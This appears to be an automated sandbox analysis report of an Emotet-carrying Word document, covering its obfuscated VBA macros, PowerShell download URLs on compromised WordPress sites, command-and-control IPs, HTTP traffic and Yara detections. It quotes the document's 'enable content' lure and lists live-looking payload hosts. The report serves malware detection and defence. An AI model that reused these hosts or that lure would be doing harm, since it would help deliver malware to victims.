Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in memory: http://campusexpo.org/department-of-odhmmkd/95eXZY/
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in memory: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /wp-admin/v/ HTTP/1.1Host: wpsapk.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-includes/2jm3nIk/ HTTP/1.1Host: sofsuite.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /content/5f18Q/ HTTP/1.1Host: veterinariadrpopui.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/n/ HTTP/1.1Host: shop.elemenslide.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wordpress/CGMC/ HTTP/1.1Host: khanhhoahomnay.netConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 209.59.139.39 209.59.139.39
Source: Joe Sandbox View	IP Address: 45.130.229.91 45.130.229.91

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: LIQUIDWEBUS LIQUIDWEBUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: AS-HOSTINGERLT AS-HOSTINGERLT

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 13_2_0020023A InternetReadFile,

13_2_0020023A

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D1917291-551E-40AF-9919-E039C2A6E74E}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /wp-admin/v/ HTTP/1.1Host: wpsapk.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-includes/2jm3nIk/ HTTP/1.1Host: sofsuite.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /content/5f18Q/ HTTP/1.1Host: veterinariadrpopui.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/n/ HTTP/1.1Host: shop.elemenslide.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wordpress/CGMC/ HTTP/1.1Host: khanhhoahomnay.netConnection: Keep-Alive

Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: wpsapk.com

Source: unknown

Source: powershell.exe, 00000005.00000002.2105381598.0000000003A66000.00000004.00000001.sdmp	String found in binary or memory: http://beatlemail.net/picture.php?blogid=0
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in binary or memory: http://campusexpo.org/department-of-odhmmkd/95eXZY/
Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp	String found in binary or memory: http://khanhhoahomnay.net
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in binary or memory: http://khanhhoahomnay.net/wordpress/CGMC/
Source: rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2099953292.0000000002400000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2103439208.00000000027A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105096202.0000000002830000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp	String found in binary or memory: http://shop.elemenslide.com
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in binary or memory: http://shop.elemenslide.com/wp-content/n/
Source: powershell.exe, 00000005.00000002.2105417379.0000000003A8B000.00000004.00000001.sdmp	String found in binary or memory: http://sofsuite.com
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in binary or memory: http://sofsuite.com/wp-includes/2jm3nIk/
Source: powershell.exe, 00000005.00000002.2105458162.0000000003AB9000.00000004.00000001.sdmp	String found in binary or memory: http://veterinariadrpopui.com
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in binary or memory: http://veterinariadrpopui.com/content/5f18Q/
Source: rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in binary or memory: http://wpsapk.com
Source: powershell.exe, 00000005.00000002.2109649059.000000001B86F000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in binary or memory: http://wpsapk.com/wp-admin/v/
Source: powershell.exe, 00000005.00000002.2099953292.0000000002400000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2103439208.00000000027A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105096202.0000000002830000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2098871684.00000000002B4000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleaneH)
Source: powershell.exe, 00000005.00000002.2098871684.00000000002B4000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: rundll32.exe, 00000008.00000002.2103265180.0000000001FC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in binary or memory: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/
Source: powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp	String found in binary or memory: https://shop.elemenslide.com
Source: powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp	String found in binary or memory: https://shop.elemenslide.com/wp-content/n/
Source: powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp	String found in binary or memory: https://shop.elemenslide.comp
Source: powershell.exe, 00000005.00000002.2105417379.0000000003A8B000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2105458162.0000000003AB9000.00000004.00000001.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: powershell.exe, 00000005.00000002.2105381598.0000000003A66000.00000004.00000001.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443

E-Banking Fraud:

Yara detected Emotet

Source: Yara match	File source: 0000000A.00000002.2105264847.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2100881704.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2102904975.0000000000321000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2109299524.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2105243347.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2102822583.0000000000300000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2109419000.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2108184568.00000000002E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2107810345.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2339841860.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2103779024.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2103864264.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 7.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.2e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.320000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words:
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words: 3 N@m 13 ;a 10096 G)
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. K O a S
Source: Screenshot number: 8	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. K O a S
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.

Document contains an embedded VBA macro with suspicious strings

Source: MAIL-0573188.doc	OLE, VBA macro line: Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")	Name: Jlda77h_v8nx5
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")	Name: Jlda77h_v8nx5
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")	Name: Jlda77h_v8nx5
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")	Name: Jlda77h_v8nx5
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String createtextfile: Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")	Name: Hrs2a1p95u19
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String createtextfile: Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")	Name: Hrs2a1p95u19

Document contains an embedded VBA with base64 encoded strings

Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String uTtCAFwHpCGF
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String lwWhZGEasjsS
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String MiCjaGqJfPrI
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String KqVyuQQfwTWh
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String mehEFPFHcklgJDDx
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String wypNISsWSXthFJCq
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String LvnHAGHfIhRDBRAF
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String NeiIGCNWgICn
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String NisSEYrcDlKQUITa
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String nJJzFRjEWpRikxCD
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String oLweAMoGsqVE

Very long command line found

Source: unknown	Process created: Commandline size = 5709
Source: unknown	Process created: Commandline size = 5613
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 5613	Jump to behavior

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Creates files inside the system directory

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Shuwftk\

Jump to behavior

Detected potential crypto function

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000976F	7_2_1000976F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021B41F	7_2_0021B41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00212C63	7_2_00212C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00223895	7_2_00223895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021C0C6	7_2_0021C0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021EE78	7_2_0021EE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021568E	7_2_0021568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002202C3	7_2_002202C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002242DA	7_2_002242DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00218736	7_2_00218736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00217B63	7_2_00217B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00224B41	7_2_00224B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0022340A	7_2_0022340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0022687F	7_2_0022687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021F444	7_2_0021F444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021E05A	7_2_0021E05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0022A0AF	7_2_0022A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002160B9	7_2_002160B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002180BA	7_2_002180BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002148BD	7_2_002148BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0022889D	7_2_0022889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002188E5	7_2_002188E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00211CFA	7_2_00211CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002220C5	7_2_002220C5
